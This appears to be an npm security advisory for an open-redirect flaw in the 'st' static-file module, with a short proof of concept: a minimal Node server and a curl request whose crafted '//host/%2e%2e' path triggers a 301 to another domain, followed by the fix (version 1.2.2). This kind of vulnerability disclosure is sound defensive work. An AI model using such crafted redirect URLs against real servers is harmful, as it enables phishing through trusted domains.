Nevertheless! Party Metaphorically

npm

Severity: moderate

Open Redirect

st

Overview

st is a module for serving static files.

An attacker is able to craft a request that results in an HTTP 301 (redirect) to an entirely different domain.

A request for: http://some.server.com//nodesecurity.org/%2e%2e would result in a 301 to //nodesecurity.org/%2e%2e which most browsers treat as a proper redirect as // is translated into the current schema being used.

Mitigating factor:

In order for this to work, st must be serving from the root of a server (/) rather than the typical sub directory (/static/) and the redirect URL will end with some form of URL encoded .. ("%2e%2e", "%2e.", ".%2e").

Code example (provided by Xin Gao):

[example.js]

var st = require('st') 
var http = require('http') 
http.createServer(st(process.cwd())).listen(1337)
$ curl -v http://localhost:1337//cve.mitre.com/%2e%2e
*   Trying ::1...
* TCP_NODELAY set
* Connected to localhost (::1) port 1337 (#0)
> GET //cve.mitre.com/%2e%2e HTTP/1.1
> Host: localhost:1337
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< cache-control: public, max-age=600
< last-modified: Fri, 13 Oct 2017 22:56:33 GMT
< etag: "16777220-46488904-1507935393000"
< location: //cve.mitre.com/%2e%2e/
< Date: Fri, 13 Oct 2017 22:56:41 GMT
< Connection: keep-alive
< Content-Length: 30
<
* Connection #0 to host localhost left intact

Remediation

Update to version 1.2.2 or later.

Resources

Thank you Rod Vagg for fixing this vulnerability in st and communicating it to us.

Have content suggestions? Send them to [email protected]

Advisory timeline

  1. published

    Advisory published
    Oct 13th, 2017
  2. reported

    Initial report by Xin Gao
    Oct 13th, 2017